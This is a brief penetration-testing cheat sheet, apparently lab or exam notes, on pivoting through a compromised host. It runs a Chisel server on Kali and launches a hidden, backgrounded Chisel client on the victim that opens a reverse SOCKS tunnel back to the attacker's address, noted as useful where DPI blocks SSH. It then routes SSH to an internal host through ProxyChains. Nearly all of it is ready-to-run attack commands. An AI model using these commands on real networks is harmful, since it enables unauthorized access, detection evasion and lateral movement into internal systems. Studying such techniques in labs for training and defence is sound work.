Chisel - HTTP-Tunneled SOCKS

Encapsulates traffic in HTTP, encrypts internally with SSH. Useful when DPI blocks raw SSH.

Server on Kali

chisel server --port 9090 --reverse

Client on the compromised host

./chisel client 192.168.118.12:9090 R:socks > /dev/null 2>&1 &

Verify the SOCKS proxy on Kali

ss -ntplu

Expect a listener on 127.0.0.1:1080.

Use through ProxyChains

/etc/proxychains4.conf:

[ProxyList]
socks5 127.0.0.1 1080

proxychains ssh sysadmin@10.8.20.130